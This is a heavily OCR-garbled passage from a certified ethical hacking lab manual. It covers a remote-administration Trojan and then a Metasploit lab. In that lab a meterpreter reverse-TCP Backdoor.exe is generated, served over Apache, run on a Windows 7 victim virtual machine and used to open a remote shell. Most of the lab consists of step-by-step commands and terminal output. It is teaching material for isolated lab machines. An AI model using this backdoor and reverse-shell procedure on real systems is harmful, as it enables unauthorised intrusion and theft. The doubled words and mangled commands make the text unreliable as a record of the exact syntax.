Rem10 te administration mode

w

r \

*>

RA mode options Resize z e window to 4:3 1 JPG Quality 190% Delay Delay in ms |

▼ j

1 !

I j

1000 1000

W Send mouseclcks W Send pressed Leys 1“

* ?

^

______

:Tnt-.aocw

Send mausemoves

W Autollpdate pics

E1K«

Cfc *

Fullscrccp

J

&

Z

Z

-----------

Crcre:5FHB

**o

I,i h

—

® 1• M 1

o;

FIGURE 10.20: capturing victim machine

26. Similar Similarly, ly, you can ca n access die details o f die victim’ victim ’s machine by b y clicking die respective functions.

Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s securi security ty posUire posUire and exposure throu gh public and an d free information. information.




P L E A S E TA T A L K T O YO YO U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S RELATED TO THIS LAB.

T o o l/ l/ U t il il i t y M osuck er

I nf nf or or m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed O u tp u t : Record the screenshots of the victim’s victim’s machine

Questions 1. Evaluate and examine various methods to t o conn connect ect to victims victims if they are 111 different cities or countries. □ Y es

0 No



0 iLabs Labs



Hack Window Windows s 7 Using Using Metas Metas p loit Metasp/o Metasp/oit itFram Framee// ork is a tool for for devel develop opiing and exec execut utin ing g exploit exploit code again against st a remote target machine.

Lab Scenario

ICON KEY Z^7 Valuable [ information ______ . * Test your _______ _ knowledge ______ e

W eb exercise *

Q Workbook revi review ew £

Large companies are comm on targets targets for hackers and attackers attackers o f various kinds and it is is no t unco mm on for these companies to be acti activel vely y monitoring traffic traffic to and from their critical IT mfrastnicture. Based 011 the functionality of the Trojan we can safely safely surmise surmise that the intent o f the Trojan is to open a backdoor 011 a com promised compu ter, allowing allowing a remote attacker to mo nitor activity activity and steal information from the compromised computer. Once installed inside a corporate network, the backdoor feamre of the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, meaning that the wealth of liitormation that may be stolen could potentially be far greater than that existing 011 a single machine. A basic principle with all malicious programs is that they need user support to do the damage to a computer. That is the reason why Trojan horses try to deceive users by showing them some other form of email. Backdoor programs are used to gam unauthorized access to systems and ba ckdo ck do or softw sof tware are is used us ed by hacker hac kerss to gain access to systems syst ems so tha t they the y can send 111 the malicious software to that particular system. Successful attacks by the hacker 01 attacker infecting the target environment with a customized Trojan horse (backdoor) determines exploitable holes 111 the current security system. You are a security administrator of your company, and your job responsibilities include include protecting the network fro m Trojans and backdoors, Tro jan attacks, attacks, theft o f valuab valuable le data from the network, and identity theft. theft.



Lab Objectives The objective objective of tins tins lab is is to help students learn to detect Trojan and backdo or attacks. The objectives of the lab include: ■

Creating a server and testing the netw ork for attack



■

Attacking a netw ork using sample back doo r and monito r the system activity

Lab Environment To cany diis out, you need: ■

A compu ter running Window Server 2012 BackTrack 5 r3 running in Virtual machine

running 111 virtual machine (Victim machine)

Windows7

■

A web browser with Internet access

■

Administrative Admin istrative privileges privileges to mil mi l tools


Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as mining die hie allocation table on a hard drive.

Lab Task Task s sd

T A S K

1

Create Sever Connection

1.

Start BackTrack 5 virUial machine.

2. O pen the terminal console by navigating to A p p li li ca ca t io io n ^ B a c k T r ac ac k ^ Exploitation Tools Framework

^ Network Exploitation Tools

^ msfconsole

,y Applications Places System | Accessories ^

B a c kl kl t dc dc k

,f

G r ap ap h ic ic *

LI UC O c t 2 3 1 0 : 0 3

AM

:

>*! Gathering

V u l n e ra ra b i li li t y A s s e s s m e n t

■0 E xploitation Ibols

In te r n et ►

^

O th e r

!^

Sound & Video

f l f S y s t e m T oo ls

► ►

^

a

W in e

Access

^

?

»

R e v e r se E n g in ee nn g

»

R FID T o o l s

►

.K

N e t w o r k E x p l o it it a t i on on Tb Tb o ls ls

/<§>

Explo itatio n Tools

^

^

Stress Testina Testina

r f - Forensics

j P

►

P n v i l e g e E s c al al a t io io n

B \ Maintaining

^

5

d

►

i l l O f f ic ic e

Open your terminal terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for diis tooL

^ Metasploit

>!. Cisco Attacks ►

.1 . FasMVack

D at a t a ba ba se se Expl• ^

a rm rm it it ag ag e

iH

W i r e l e s s E x p lo ^

m sfd i

i f - . S AP E x p l o i t a t i o n

S o c ia l E n g m e e ^

m sfc o n s o le

^

P hy hy si si cca a l E xp xp lo lo ^

m s fu fu pd pd at at e

»

is r -e v il g r a d e n et et oe oe ar ar -t -t el el ne ne te te na na bl bl e termineter

O p e n S o u r c e E 3b. start msfpro

►

Me M e ta ta sp sp lo lo it it F ra ra me me wo wo r k

V

R e po po r ti ti n g T o ol ol s Services M i s c e ll ll a n e ou ou s

<<

*

m

_

back track

—

,

[Create Simple Exploit...


Ethica l Ha ckin g and Cou ntenn easures Copyrigh Copyrightt © by EC-Council EC-Council AH Rights Reserved. Rep roduction is Stricdy Prohibited.


FIGURE 11.1: Selecting msfconsole from metasploit Framework

3. Type the following com man d 111 msfconsole: msfpayload wind ows/m eterpreter/reverse tcp LHOST=10.0.0. LHOST=10.0.0.6 6 X> D e s k t o p / B a c k d o o r . e x e and pre ss Enter

This IP address (10.0.0.6) is BackTrack machines. These IP addresses may vary in in your lab environment. Note:

I I

BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection

File Action Media Clipboard View Help

« 3 ®S 0

II 1►fe

1

Applications Places system

Cj

! S 3 T U e 0 C t 2 3 . 3 :3 :3 2 P M

I File Edit View Term inal H elp

3K0a 3K0a SuperHack II

Logon Logon

xracK

-

» [ m e t a s p l o i t v 4 . s. s. 0 - d e v [ c o r c : 4 b a p t : 1 . 0 ] 927 ]= e x p l o i t s • 4 99 99 a u x i l i a r y - 1 51 51 p o s t 2 5 1 ] = p a y l o a d s • 2 8 e n c o d e r s - 8 nops

; > jnsfpayload win dow s/neterpr eter/reve rse

y

t c p L H O S T - 1 O . 0 .0 .0 . 6 X > D e s k t o p / B a c kd kd o o r

FIGURE 11.2: CreatdngBackdoor.exe

Metasploit Framework, a tool for developing and executing exploit code against a remote target machine

4. Tins com man d will create a W i n d o w s e x e c u t a b l e f i l e with name the B a c k d o o r . e x e and it will be saved on the BackTrack 5 desktop. ----------------------J File Action

Media

Clipboard

V!* *

BackTrack BackTrack on W1N-D39MRSHL9E4 W1N-D39MRSHL9E4 - Virtual Virtual Machine Connection

Help

it 0 ® @g ! it fe ^

Applications cations Places aces System System

U

1ue OCt 23. 11 11: 5 53 3 AM

A

Backdoor.exe

<< back I track ,Vi

ja j a a j FIGURE 11.3: Created Backdoor.exe file

5. No w you need to share B a c k d o o r . e x e with your victim machine (Windows 7), by following these steps: CEH Lab Manual Page 51 519



6.

O pen a new BackTrack 5 terminal (CTRL+ALT+T) and then nan this command mkdir /var/www/share and press Enter to create a new director} share.

To create new directory share following command is usedmkdir / var/www/ share share

FIGURE 11.4: sharing the file

7. Change the mode fo r the the share folder folder to to 755, 755, by entering the comm and chmod -R 755 /var/www /var/www /share/ and then press Enter T=TB"■ BackTrack BackTrack on W1N-D39MRSHL9E4 W1N-D39MRSHL9E4 - Virtual Virtual Mach ine Con nection


<910 (■ ) @ O II It fe

,

d

A p p l i c a ti ti o n s P l a c e s S y s t e m

FT ■RieOct 23 . 12:03 Pf/

.f t

Backdoor.exe

•*> File

1-.

root^bt: — Edit

ô ot$>i ot$>i

View

Terminal

Help

ra*
-k c h a o d • R 7S 7S 5 / v a r / * w w / s h a r e / |

I

change die mode of m To change share folder use the following comma11d:chmod -R * /var/www/ share/ share/

<< back I track £ ai FIGURE 11.5: sharing the file into 755

8. Change the ownership of that folder folder int into o www-data, by entering the the command chow n -R ww w-data:ww w-data /var/www/share/ and then press pre ss Enter.





Fil•

Action Action

Mid i•

Clipboard

Mw

Hilp

It > ® @ 0 II It >» d I

Applications cations Places Places system (* ]

'

v

k

RJ Coct 23. 12:0 PM

root^bt:

ile Edit View Terminal Help

otgfet: * nkdi r / var/ www/ share -2 i.llL .

■■ TT;

ot'jbt:-♦ ot'jbt:-♦ cnow cnown n •R ^>

.

i

dara:v.w data data /yar/w //sftr>r c/ \

To ch an ge ownership of folder into www, use this this command chown -R www data /var /v ar /w w w/ sh ar e/

< <

back I t r ack ac k 5 FIGURE 11.6: Change the ownership of the folder

9. Type the comm and Is -la /var/www/ | grep share and then th en pres ress Enter BackTrack BackTrack on W1N-D39MR5HL9E4 - Virtual Machine Connection

'-!° *


U

3 ® S> 0

I I I t ff ffe

d [> -< : 1ueOCt 23.1 23. 1

Applications Places system (>

s

v

x

ro ro o tt^^ b t -

Tile Edit View Terminal Help

root^bt:-* nkdir /var/ww/share rootgbt:-# chaod -R 755 /var/wvw/share/ c ho ho w r - R w » d a t a : w u w d a t a / y a r / w w / s t m r e / 'c -~ roct^bt:-» Is -Id /varA**t/ | grep share|

<< back I track 5 -0 3 FIGURE 11 11.7: .7: sharing die Backdoor.exe file

10. The next step is to start the A p a c h e s e r v e r by typ typing ing the s e r v i c e a p a c h e 2 s t a r t command 111 the terminal, and then press Enter.





Fil•

Action Action

Mid i•

It > ® @ 0

CI 1pbo»rd

V!**

Htfp

II 1► >»

Applications Places system ( ]

a

I

1UC C Ct Ct 2 3 . 1 2 :0 :0 7 P M

raot^bt: — File Edit View TSfrminal Help

rootjabt: # nkdir /var/www/share rootjabt:-* ch«od -R 755 /var/ww/share/ ro otg bt: '♦ chowr chowr ■R vm data:www data:www data /var/wwv/shar< /var/wwv/shar< r o o t g b t : - ♦ I s - l a / v a r / w w / | g re re p sh sh ar ar e drw xr- xr- x 2 www-data www-data ww -dat a 4 4096 096 2012-10-23 12 A -pet :cl: -♦ service apach apache2 e2 star t | * Sta rting web server apache2 apache2 httpd (pid 3662) already running

A

back I t r ack ac k £

<<

-03. & T o r un un t he he apache web server us e the followi following ng command: cp /r oo t/.m t/. m sf4/ sf 4/d d ata/ at a/ ex ploits /* /var /v ar /w ww /sh ar e/

FIGURE 11 11.8 .8:: Starting Apache Webserver

11 11.. No w your Ap ache web server is running, running, copy the B a c k d o o r . e x e file into the share folder. folder. Type the following following comm and c p /r o o t/ D e sk to p /B a c k d o o r .e x e /v a r/ w w w /s h a re / and press Enter « « I©®©a 11 !»■ r» BackTrack BackTrack on W1N-D39MRSHL9E4 W1N-D39MRSHL9E4 - Virtual Virtual Machine Connection

File Action Media Clipboard View Help ,

A

Backdoor.exe

v

x

root'Jbt: ~

Rle Edit View Terminal Help

rootstot:-# nkdir /var/ww/share root0 b t : - 4 1 chaod -R 755 /var/ww/share/ roo tgb t:'• chow chown n r m/m m/m data:wv data:wvw w data data /var/w wvr /shar• /-.^ rootpbt:*# Is -la /w ar/mm/ | grep grep share share dr w xr -x rx 2 v/^v data ww#r data 4096 2612 JQ-21 n!n1 utm root0bt:*f service apache2 start • St ar tin g web web serve r apache2 apache2 httpd (pid 3662) already running rootflbt:-*

c p / r o o t / D e s k to to p / B a c k d o o r . e x e / v a r /w /w w w / s h a r e /

L i J i : a i i : 111:1 l . .a .a , t iu iu - u l : . I i 11: l l 11111:1. c p / ro ro o t / O e v k t Q p / B d c k d o o f . e x e / v a r /w /w w w / s h a i e /

<< back I track 1 Status: Running

FIGURE 11.9: Running Apache Webserver

12. Now go to Windows 7 Virtual Virtual Machine, Machine, op en Firetox o r any web 111 the URL field and bro ws er, and an d type the UR L http:// 1 0 . 0 . 0 . 6 /s h a r e / 111 then press Enter Here 10. 10.0.0 0.0.6 .6 is is the IP address o f BackTrack; it may vary 111 your lab environment. Note:




Windows 7 on W1N-D39MR5HL9E4 W1N-D39MR5HL9E4 - Virtual Virtual Ma rin e Connection

Fil•

Action

Media

Clipboard

V!**

» 0 ) ( >! Q n 1► ;fe fe0

Halp

Indtx of /than / than ’

aha'c'10.0.0.6 l£1 MottVniUd

C 9 $U 11*d 11*d i..i Su99 G«ttin G«ttin9 Su 99«a«d «a«d SiUt

*11 GopfJe

-

W«t>SUa W«t>SUa G^lcfy

= ' ■te ° * D

B » kn kn w

I

Index Inde x of/sha re Name

Last modified

Sue Description

Parent Directory

23-0ct-2012 12:12 72K A p a c h e / 2 . 2 .1 .1 4 ( U b t m r u ) S e r v e r a t 1 0 0 . 0 . 6 P o r t S O

,W^cwM'WUY...

BackTratj^^VI ^J

W indowô^fl, o^fl,

FIGURE FIG URE 11 11.10 .10:: Firefox web browser with Backdoor.exe

If you didn't h a v e a p a c h e2 installed, run aptget install apache 2

13. Download and save the B a c k d o o r . e x e tile tile in Windo ws 7 Virtual Machine, and save tins file on the desktop. HZ 10 ®@0 II 1► ife5 Action

Media Clipboard View ew Help

C EH Certi fied

Ethical

Hacker

•Unnujl*

w FIGURE 11.11: Saved Backdoor.exe on desktop

14. Switch back to the BackTrack m achine. achine. 15. Open the Metasploit console. To create a handler to handle the connection Irom victim victim macliine (Windows (Windows 7), type the comm and u s e exploit/multi/handler and press Enter





m

The exploit will will be saved saved

on / root/.msf4/data/exp root/.msf4/data/exploits/ loits/ folder

Fil• It

Action > ®

Midi•

CI!pbo» CI!pbo»rd rd

@ 0

II

V!** It

Htfp

>»

Applications Placcs system v

A

I

1UCOCt 23. 12:30 PM ,

x !terminal

Bnckdoor.e f ' 1* Ed lt V1ew Terminal Help

•

!

( .

*/

nsf > nsfpayload w1 ndows/ »eterpreter/reverse tcp LHOSW97T1m7b.91 X^tofefetop/Backdoor.exe [*] exec: exec: nsfpayload nsfpayload windows/rete rpreter/reve rsetcp LHOST LHOST-1 -192 92.. I$a-e0?9ix I$a-e0?9ix > C ^g w ^ ^j d o o r Created by nsfpayload ( h t t p : / / M M . n e t a s p l o l t . c o n ) . Payload: windows/meterpreter/reverse tcp Length: 290 Options: ("LHOST192.168 . 8 . 91 <:=*"> wsf > use use explo it/nu lti/ha nd ler | nsf exp loit (handler) >

%

<< b ack ac k I t r ack ac k ^ FIGURE 11 11.12 .12:: Exploit the victim machine

16 16.. T o use the reverse TCP, type the comm and s e t p a y l o ad ad w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p and press Enter •


«

File Action Media Clipboard View Help < 0 10 10

®

e

e

11 i t

h

*>

Applications Places system

Backdoor.J

U=U U=U To set reverse TCP TC P vise the following command set payl payloa oad d windows/meterpreter/reverse - tcP tcP

Fl|e

Edit View

£j

[>y, 1ue OCt 23. 12:3 6 PM ,

Terminal Help

msf > tisfpayload windows/neterpreter/reverse tcp LHOST192.168.8.91 [*1 exec: nsfpayload wlndows/reterpreter/reverse tcp LH0ST=192.J68.8

I

Created by nsfpayload

!esktop/Backdoor.exe ^*jp es k top / Ba ckd0 0 r

i l

( h t t p : / /M /M M . n e t a s p l o i t. t. c o n ) .

Payload: windows/meterpreter/reverse tcp Leng th: 290 Options : { LHOST"->" 192.168 8 .91 > BSl > use use exo lolt/Bu lTl/handler

f

:f/ ^

n s f e x p l o i t ( h a n d lv lv r ) > l s e t p a y l oa oa d w i n d o w i / n e t e r p r e t e r / r e v e i s e t c p l pa y I on d -> w in do ws /m et e r pm vr 7T PV Pr CT r r p 1 fl fc fc f e x p l o i t ( h a n d l e r ) >

<< back I track 5 FIGURE 11 11.13 .13:: Setup die reverse TCP

17. To set the local IP address that will catch the reverse connection, type the command se t Ihost 10.0.0.6 (BackTrack IP IP Add ress) and press Enter




BackTrack 0 W1N-D39MR5HL9C4 W1N-D39MR5HL9C4 - Virtual Machine Conn ection

Fil• •it

Action

Midi*

9 ( •) •) ©

Clipboard

0

Vi**

H*lp

M l *• *•

Applications Placcs system (*J

d

I

HJC o c t 23 . 1 2 2:: 40 40 PM

1/5 r I A Avv * Tfcrroinal Bnckdoor.J

'«

Edit

View

Terminal

Help

! n i l > i s f p a y l o a d w i n d0 1 r f s / » e t e r p r e t e r / r e v e r s e _ t c p 1 H 0 S T -1 -1 9 2 ..1 1 6 8 . 8 . 9 1 X > D e s k t o p / B a c K d o o r. r. e x e I [ ♦ ] e x e c : m s f p a y l o a d w i n d o w s / n e t e r p r e t e r / r e v e r s e t c p L H Q S TT- 1199 22.. 1 6 8 . 8 . 9 1 X > D e s k t o p / B a c k do do o r ..!!

Created by rasfpayload ( h t t p : / / w w x . n e t a s p l o i t . c o n ). ). . — -

""

P a y lo lo a d : w i n d o v s / m e t e r p r e t e r/ r/ r e v e r s e _ t c p Length: 298 o p t i o n s : { " LH LH 0 5 T“ T“ = > " 1 9 2 . 1 6 8 . 8 . 9 1 * } m s f > u s e e x p l o . i t / 11 u l t i / h a n d l e r

msf ex plo it(ha ndler) > set payload wm dows/n eterpreter/re verse Tcp Tcp payload => windows/neTerpreTer/reyerse tco msf msf ex plo it(handler) > |set Ihost 1 8 . 6 . 5 . 6 | IhosT => 1 0 . 6 . 0 . 6 e x p lo it (h and ler) >_____________ >________________________ ______________________ _____________________ _______________ _____

<< b ack ac k I t r ac k 58a. FIGURE 11.14: set the lost local IP address

18. To start the handler, type the command exp loit -j -j -z and press Enter BackTrack BackTrack on W1N-D39MR5HL9L4 - Virtual Machine Connection

I I 1


« ) ® @•

^

j

Applications Places system [>^j

^

/4 /4 t I

■

TUe TUe OCt 23.12:44 PM

“ < <' !«

Backdoor.d File Edit View Terminal

Help

Created by nsfpayload ( h t t p : / / w w . n e t a s p l o i t . c o n ). P a y l o a d : w i n d o w s /m /m e t e r p r e t e r / r e v e r s e t c p Length: 290 O p t i o n s : { ,IHOST■ ,IHOST■‘=>•'1 ‘ =>•'1 9 2 .1 6 8 .8 .9 1 } m s f > u se se e x p l o i t / n u l t i / h a n d l e r m s f e x p l o i t ( h a n d l e r ) > s e t p a y l o a d w i n d o w s / n e te te r p r e t pa y lo ad => w in d o w s/ ri e te rp re te r/ re v e rs e tc p msf exploit(han dler) > set Ihost 18.6.8.6

Ihost -> 10.0.0.6

j

m s f e x p l o i t ( h a n d l e r ) > ! e x p l o i t - j - 1 1 I * ] E x p l o i t r u n n i n g a s b a c k g r o u nd nd j o b [-I Starte d reverse handler on 18.0.8.6:4444 I I Starting the payload handler... msf e xp loit(h andler) > I

<< back I track 5 FIGURE 11.15: 11.15: Exploit the windows 7 machine

19. Now switch to the v i c ti ti m m a c h i n e (Windows 7) and double-click the file to run it (w hich is is already downloaded) B a c k d o o r . e x e file 20. Again switch to the BackTrack machine and you can see the following figure.




! - ,“ *


Filt Action M#di* CI 1pbo»rd

•it S

( •) •) @ O

II

1

Vi• *

Htfp

*»

Applications Places system ^ /

x

d

a

v

File

Edit Vie w Termin al

M: TUco ct23. 3:02 pm ,

!terminal He lp

Back( Back( ♦ " * “ I 9927 27 exp loit s • 499 aux iliar y • 151 post «■ 251 ]■- - • pa yl oa ds 28 en co de rs 8 nops 1st > msfpayload window s/iieter prete r/reve rse tcp LHOST-1 LHOST-10.0 0.0.0 .0 6 X > Desktop Desktop Backdoor.exe Backdoor.exe [*] exec: nsfp ayload wind oirfs/m eterp reter/re verse tcp LHOST=10. LHOST=10.00.0.6 .0.6 X > Desktop Backdoor.exe Backdoor.exe s h : D e s k to to p : i s a d i r e c t o r y msf > msfpayload wi nd ow s/ne terp rete r/rev erse tcp LH0S LH0ST= T=18 18.0.0 .0.0 .6 X > Desktop/Backdoor.exe l J exec: nsfpayload windoirfs/meterpreter/reverse tcp LHOÎ lft.ft.-O^TX 0 * e^1tt’6J»/Backdo 6J»/Backdo or.e xe Created by msfpayload u s e e x p l o i t / m u l t i /h /h a n d l e r r s f e x p l o i t ( h a n c l e r ) > s e t p a yl yl o a d w i n d o w s / n e t e r p r e t e r / r e v e r s e t c p pay loa d => w in d ow s/ m ei er p re te r/ re ve rs et cp a is is f e x p l o i t ( h a n d l e r ) > s e t I h o s t 1 0 . 0 . 8 . 6 I host => 10.0.0.6 l i l e x p l o i t ( h a n d le le r ) > e x p l o i t - J - £| £|

[*] ^l ^ l o i t 1^nnirâ 1^nnirâ^fca0 ^fca01ô r)^|joW /T

[ * ] ^ ^ r t ^ t a f e v e r s e r a n d ie ie r o f!f! 1 8 . 0. 0. 9 . 6 :4 :4 4 4 4 l 3 * S t a r t i n g t h e p r fy fy t oa oa d h s r d i e r ^ r r

^

_

_____________

Lf cl L is .

■lJiif i s l ex e x pplo l o iit(handler) t ( h a n d l e r ) >> [[ • !] Sending S e n d in in g StJBc s t ^ e (751121 ( 7 551 1 1 28 28 b y t e s ) t o 1 0 . 0 . 0 . 5 !] J I n t e r p r e t e r s e s s i o n 1 o pe pe n ed ed ( 1 0 . C 6 . 6 : 4 444 4 4 - > 1 0 . 0 . 8 .5 .5 : 4 9 4 5 8 ) a t , 1 2012-18-23 !? :57152 ♦0530 |

l&To interact with the available sessio n, you can can u s e s e s s i o n s -i -i

FIGURE 11 11.16 .16:: Exploit Exploi t result o f windows windows 7 machine

21. To interact with the available session, type the command s e s s i o n s -i -i 1 and press Enter

FIGURE 11.17: creating the session

22. Enter the command shell, and press Enter.




r .

BackTrack BackTrack on WIN-D39MRSHL9E4 - Virtual Machine Connection

| File Action Media Clipboard V ** \
0

( •) •) ®

o

/

a

*

11 1

A p p li c a ti o n s P i a c c s s y s t e m ^

1

Help

/ / n

x

d

IX

IUC OCt 2 3 , 3 : 1 3 PM

*!terminal

File Edit view ifefmmal Help

Backc Created by msfpayload ( http://www.netasplo 1 t . c o ■ >. Payload: windows/neterpreter/reverse tcp Length: 290 Options : CLHO CLHOST*10. ST*10. 0. 0. 6“ <■ "} nkl > use exploit/multi/handler msf msf ex plo it(handler) > set paylo payload ad window s/neterpreter/reversetcp payloa payload d *> windows/m eterpreter/reversetcp «1 sf ex plo it(handler) > set !host 16.6.8.6 I host 10.0.0.6 < B i l e x p l o i t ( h a n d le le r ) > e x p l o i t - j - 2 [*J Exploit running as background job. [*1 Started reverse handler on 10.0.6.6:4444 [*j Starting the payload handler... Il il ex plo it(handler) > [*] Sending Sending stage stage (752 (75212 128 8 bytes) bytes) to 10.0.0.5 [*] Meterpreter session 1 opened (10.6.0.6:4444 -> 10.0.0.5:49458) at 2012-10nsf ex plo it(handler) > sessions o ns *i 1 [*] S tarting interaction with 1...

c!«JS<1V1 I J Q 75© Ltj | \ Microsoft Windo indows Tv e/ sio if^n . 75©tj Copyright (c) 2009 2009 Micro soft Corpor ation.

LI Q L IV Al

righ ts reserved,

c :\users\AiHnln\pesktop>|

FIGURE 11 11.18 .18:: Type the shell command

23. Type the dir command and press press Enter It shows all the directories pres pr es ent en t on the vic tim mach ma chine ine (W (Wind indow owss 7). 1- 1° ' r ’ BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection


<010 ®@e ®@e 111► 1fe 5 Applications Places system /

a

v

x

cj

T er er m i n a l

.. / File Edit Edit View View Terminal Help Backc

»1 sf ex plo it(handler) > sessions sessions - i 1 [-] Invalid session id nsf ex plo it(handler) > sessions o ns i 2 [*] starting interaction with 2... interpreter > shell Process 2540 created. Channel Channel 1 crea ted. Microsoft windows [version 6.1.76011 Copyright (c) 2009 2009 Micro soft Corporation.

A ll rights reserved.

C:\Users\Adtnin\ C:\Users\Adtnin\Desktop?bi Desktop?bi f I d ir volume in drive c has no label. Volume ume Seri al Nunber Nunber is 6868-71F6 6868-71F6 Oirec tory of C:\Users\Adnin\Desktop 10/23/2012

02:56

<0IR>

|

f t p s Ljsis

.

1e/Sie1^ 1w,c1 s g f t e z 3 •w 2

a

I

Oir(s)

a

56.679,9 56.679,985.152 85.152 byteslfree

C:\Users\Adrn1 n\Desktop>§

FIGURE 11 11.19 .19:: check die directories of windows 7

Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion 011 your target’s security pos ture and exposure expos ure dirou dir ough gh public pu blic and a nd free information. inform ation.



P L E A S E T AL AL K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B. B.

T o o l/ l/ U t il il i t y M e ta s p l o i t

I n fo fo rm rm a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed O u tp u t : Hack the W indows 7 machine directories directories

Internet Conn ection ection R equired □ Y es

0 No



0 iLabs Labs

Ethica l Ha ckin g and Cou ntenn easures Copyrigh Copyrightt © by EC-Council EC-Council A l Rights Reserved. Reproduction is Strictly Strictly Prohibited.

CEH v8 Labs Module 06 Trojans and Backdoors

Recommend Documents